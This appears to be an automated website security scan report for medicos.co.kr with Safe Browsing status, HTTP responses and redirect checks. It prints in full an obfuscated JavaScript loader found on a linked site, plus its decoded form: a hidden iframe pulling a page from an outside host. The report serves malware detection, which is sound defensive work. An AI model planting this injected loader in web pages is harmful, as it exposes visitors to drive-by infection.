Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=medicos.co.kr
Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://medicos.co.kr/ | HTTP/1.1 302 Object moved Cache-Control: private Date: Tue, 26 Aug 2014 20:28:25 GMT Location: /index.asp Server: Microsoft-IIS/6.0 Content-Length: 131 Content-Type: text/html Set-Cookie: ASPSESSIONIDQQAABQCR=LGEJDPDCNDIMBABKOMPOALDD; path=/ X-Powered-By: ASP.NET | clean |
http://medicos.co.kr/index.asp | 200 OK Content-Length: 767 Content-Type: text/html | clean |
http://www.samwooind.co.kr/fckeditor/top.js | 200 OK Content-Length: 602 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var _$=['\x77\x61\x6e\x67','\x77\x61\x6e\x67\x3d\x59\x65\x73\x3b\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d',"\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x67\x70\x61\x6e\x2e\x63\x6f\x2e\x6b\x72\x2f\x64\x61\x74\x61\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x20\x77\x69\x64\x74\x68\x3d\x31\x30\x30\x20\x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e"];if(document.cookie.indexOf( _$[0])==-0x1){var a=new Date();a.setTime(a.getTime()+0xc*0x3c*0x3c*0x3e8);document.cookie= _$[1]+a.toGMTString();document.write( _$[2])}
Decoded script:
<iframe src=http://gangpan.co.kr/data/index.html width=100 height=0></iframe>
Antivirus reports:
http://medicos.co.kr/test404page.js | 404 Not Found Content-Length: 92 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: medicos.co.kr
Result:
HTTP/1.1 302 Object moved
Cache-Control: private
Date: Tue, 26 Aug 2014 20:28:25 GMT
Location: /index.asp
Server: Microsoft-IIS/6.0
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQAABQCR=LGEJDPDCNDIMBABKOMPOALDD; path=/
X-Powered-By: ASP.NET
...131 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: medicos.co.kr
Referer: http://www.google.com/search?q=medicos.co.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.